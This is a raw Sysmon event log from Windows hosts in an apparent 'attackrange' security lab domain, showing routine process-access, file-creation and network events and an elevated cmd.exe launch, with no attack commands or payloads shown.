07:51:53.503{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048703Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:53.503{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F499-60EB-2D7D-00000000CF01}10224C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048702Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:53.504{466BC892-F499-60EB-2D7D-00000000CF01}10224C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048701Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:53.487{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA72A19A2649004CE2C341CCC606F20A,SHA256=05612726FA58DC7F4B24FDBD1F5624C493D1567243C908850F445872552758C1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807498Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:52.277{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57259-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807497Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:53.254{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01CE00DB4C00E50FC289E26C925280F2,SHA256=9EF894656572DAC61630DE0BB5378F21F6FE88B4ABE7C9BC2935376541186466,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048770Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.986{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF2E704CBD70F6E97E0242DF303EEA99,SHA256=553E7BC1599D65B8533DBB9BBB25BE2B2A3FD9BAD63C7D37E9DCDD996F543BB6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048769Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.971{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F49A-60EB-327D-00000000CF01}6188C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048768Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:54.971{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F49A-60EB-327D-00000000CF01}6188C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048767Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.971{466BC892-F49A-60EB-327D-00000000CF01}61886504C:\Windows\system32\conhost.exe{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048766Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.955{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F49A-60EB-327D-00000000CF01}6188C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048765Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.955{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048764Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:54.955{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048763Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.955{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048762Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:54.955{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048761Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.955{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048760Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:54.955{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048759Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.955{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\appinfo.dll+2073|c:\windows\system32\appinfo.dll+3c57|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048758Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.948{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" 
C:\Windows\system32\ATTACKRANGE\Administrator{466BC892-F49A-60EB-D4CC-F90400000000}0x4f9ccd43HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{466BC892-32D3-60E8-6F0B-00000000CF01}7076C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding 10341000x80000000000000001048757Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.918{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F49A-60EB-307D-00000000CF01}10076C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048756Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.918{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F49A-60EB-307D-00000000CF01}10076C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048755Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:54.918{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F49A-60EB-307D-00000000CF01}10076C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048754Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.886{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001048753Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.886{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048752Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.855{466BC892-02B0-60E8-1600-00000000CF01}13047824C:\Windows\System32\svchost.exe{466BC892-F49A-60EB-2F7D-00000000CF01}1148C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048751Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:54.855{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F49A-60EB-2F7D-00000000CF01}1148C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048750Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.855{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F49A-60EB-2F7D-00000000CF01}1148C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048749Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.851{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F49A-60EB-2F7D-00000000CF01}1148C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048748Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:54.833{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F49A-60EB-2F7D-00000000CF01}1148C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048747Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.833{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F49A-60EB-2F7D-00000000CF01}1148C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048746Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:54.818{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048745Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.818{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048744Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
